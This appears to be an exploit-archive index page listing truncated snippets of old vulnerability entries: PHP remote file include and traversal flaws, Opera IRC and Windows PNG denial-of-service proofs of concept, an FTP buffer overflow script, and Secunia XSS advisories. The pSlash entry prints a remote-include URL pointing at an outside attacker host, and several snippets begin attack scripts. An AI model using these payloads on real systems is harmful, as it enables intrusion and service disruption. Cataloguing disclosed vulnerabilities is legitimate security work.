ContentNow Directory Traversal(upload.php)

ContentNow Directory Traversalupload.php ------------------------------------------ -vulnerability By: Timq -http://securitydb.org -Team Root-Shell -Email:timqathushmail.com ------------------------------------------ It appears that it is possible to view any files on a system via 'upload.php'...

phpbbViewed10.txt

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= phpBB User Viewed Posts Tracker Version = 1.0 phpbbrootpath File Include Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Discovered by XORONturkish...

phpBB User Viewed Posts Tracker <= 1.0 File Include Vulnerability

Exploit for unknown platform in category web applications ================================================================= phpBB User Viewed Posts Tracker = 1.0 File Include Vulnerability =================================================================...

Web Server Creator v0.1 (l) Remote Include Vulnerability

Exploit for unknown platform in category web applications ======================================================== Web Server Creator v0.1 l Remote Include Vulnerability ======================================================== Web Server Creator v0.1 l Remote Include Vulnerability Author: XORON...

pslash07.txt

pSlash v0.7 lvcincludedir Remote Include Vulnerability Author: XORON Class: Remote cont@ct: x0r0nathotmaildotcom Code: require$lvcincludedir.'db/dbmysql.inc.php'; Exploit: http://www.site.com/path/modules/visitors2/include/config.inc.php?lvcincludedir=http://evilscripts? Greetz: str0ke, Ironfist,...

opera9dos.txt

/ Opera 9 IRC client DOS exploit by Preddy and NNP http://www.smashthestack.org http://silenthack.co.uk http://www.team-rootshell.com 12 August 2006 / include include include include include include include include include include include define MYPORT 6667 define BACKLOG 10 // : KICK\r\n char di...

pSlash 0.7 (lvc_include_dir) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ============================================================== pSlash 0.7 lvcincludedir Remote File Include Vulnerability ============================================================== pSlash v0.7 lvcincludedir Remote Include Vulnerability...

Microsoft Windows - &#039;.png&#039; IHDR Block Denial of Service (PoC) (2)

// Microsoft Windows PNG IHDR block DoS PoC 2 // // CPU load goes to 100% until you restart explorer.exe // // Bug found by: Preddy ? // // Compiled and tested with Windows XP SP2, Visual studio 6, no psdk // // Header: 89 50 4e 47 0d 0a // // Greets: scoper, HCorny, eleet aka takker01 and...

MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2)

No description provided by source. // Microsoft Windows PNG IHDR block DoS PoC 2 // // CPU load goes to 100% until you restart explorer.exe // // Bug found by: Preddy ? // // Compiled and tested with Windows XP SP2, Visual studio 6, no psdk // // Header: 89 50 4e 47 0d 0a // // Greets: scoper,...

Microsoft Windows - &#039;.png&#039; IHDR Block Denial of Service (PoC) (1)

!/usr/bin/perl Microsoft Windows PNG IHDR block DoS poc More info: http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=6 Written by Preddy don't create the poc png file on windows it won't work as it should when i create it on windows with activeperl or visual c the png header become...

Opera 9 IRC Client - Remote Denial of Service (Python)

Opera 9 IRC Client - Remote Denial of Service Python !/usr/bin/python Opera 9 IRC client DOS NNP + Preddy http://silenthack.co.uk http://smashthestack.org http://www.team-rootshell.com import socket die = '''\x3a\x61\x61\x61\x20\x33\x35\x33 \x20\x15\xf8\x9c\x71\x0a\x3a\x64...

Opera 9 IRC Client Remote Denial of Service Exploit (py)

No description provided by source. !/usr/bin/python Opera 9 IRC client DOS NNP + Preddy http://silenthack.co.uk http://smashthestack.org http://www.team-rootshell.com import socket die = '''\x3a\x61\x61\x61\x20\x33\x35\x33 \x20\x15\xf8\x9c\x71\x0a\x3a\x64 \xff\x26\xf8\x9b\x33\xd2\x9b\x34...

Opera 9 - IRC Client Remote Denial of Service

/ Opera 9 IRC client DOS exploit by Preddy and NNP http://www.smashthestack.org http://silenthack.co.uk http://www.team-rootshell.com 12 August 2006 / include include include include include include include include include include include define MYPORT 6667 define BACKLOG 10 // : KICK\r\n char di...

docpile:we <= 0.2.2 (INIT_PATH) Remote File Inclusion Vulnerabilities

Exploit for unknown platform in category web applications ===================================================================== docpile:we = 0.2.2 INITPATH Remote File Inclusion Vulnerabilities ===================================================================== TiTLE: docpile:we v0.2.2 INITPATH...

MS Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit

Exploit for unknown platform in category dos / poc ================================================================ MS Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit ================================================================ / Windows TCP/IP source routing poc C version... by...

acFTP FTP Server 1.4 - &#039;USER&#039; Remote Buffer Overflow (PoC)

===== acFtpd BoF Crash Exploit ===== There is a Buffer overflow at the USER command in acFtpd. Vuln found by: Preddy RootShell Security Group Usage: acdos.pl use IO::Socket; use Win32; use strict; my$i = ""; my$socket = ""; my $overflow = "A" x 4700; if$ARGV0 == "" print "\n"; print " ===== acFtp...

acFTP FTP Server &lt;= 1.4 (USER) Remote Buffer Overflow PoC

No description provided by source. ===== acFtpd BoF Crash Exploit ===== There is a Buffer overflow at the USER command in acFtpd. Vuln found by: Preddy RootShell Security Group Usage: acdos.pl ip use IO::Socket; use Win32; use strict; my$i = ""; my$socket = ""; my $overflow = "A" x 4700; if$ARGV0...

[SA19443] PHP Script Index &quot;search&quot; Cross-Site Scripting Vulnerability

TITLE: PHP Script Index "search" Cross-Site Scripting Vulnerability SECUNIA ADVISORY ID: SA19443 VERIFY ADVISORY: http://secunia.com/advisories/19443/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: PHP Script Index http://secunia.com/product/9033/ DESCRIPTION:...

[SA18535] My Amazon Store Manager &quot;q&quot; Cross-Site Scripting Vulnerability

TITLE: My Amazon Store Manager "q" Cross-Site Scripting Vulnerability SECUNIA ADVISORY ID: SA18535 VERIFY ADVISORY: http://secunia.com/advisories/18535/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: My Amazon Store Manager 1.x http://secunia.com/product/6880/...

[SA18469] Netbula Anyboard &quot;tK&quot; Cross-Site Scripting Vulnerability

TITLE: Netbula Anyboard "tK" Cross-Site Scripting Vulnerability SECUNIA ADVISORY ID: SA18469 VERIFY ADVISORY: http://secunia.com/advisories/18469/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: Netbula Anyboard 9.x http://secunia.com/product/2070/ DESCRIPTION:...